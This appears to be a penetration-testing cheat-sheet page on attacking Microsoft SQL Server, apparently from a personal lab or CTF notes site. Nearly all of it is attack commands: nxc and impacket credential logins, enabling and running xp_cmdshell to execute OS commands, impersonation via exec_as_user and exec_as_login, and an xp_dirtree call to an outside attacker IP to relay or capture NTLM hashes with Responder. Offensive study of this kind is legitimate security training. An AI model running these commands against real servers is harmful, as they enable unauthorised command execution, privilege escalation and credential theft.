MSSQL

Try access with creds

nxc mssql <ip> -u <user> -p <password> -d <domain>
nxc mssql <ip> -u <user> -p <password> --local-auth

Access using impacket

mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

inside impacket

enable_xp_cmdshell
xp_cmdshell <cmd>

enum_impersonate
exec_as_user <user>
exec_as_login <login>

#relay hash with responder running on kali
exec xp_dirtree '\\10.10.14.85\whatever',1,1

inside sql

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

Previousnmap NextHTTP

Last updated 9 months ago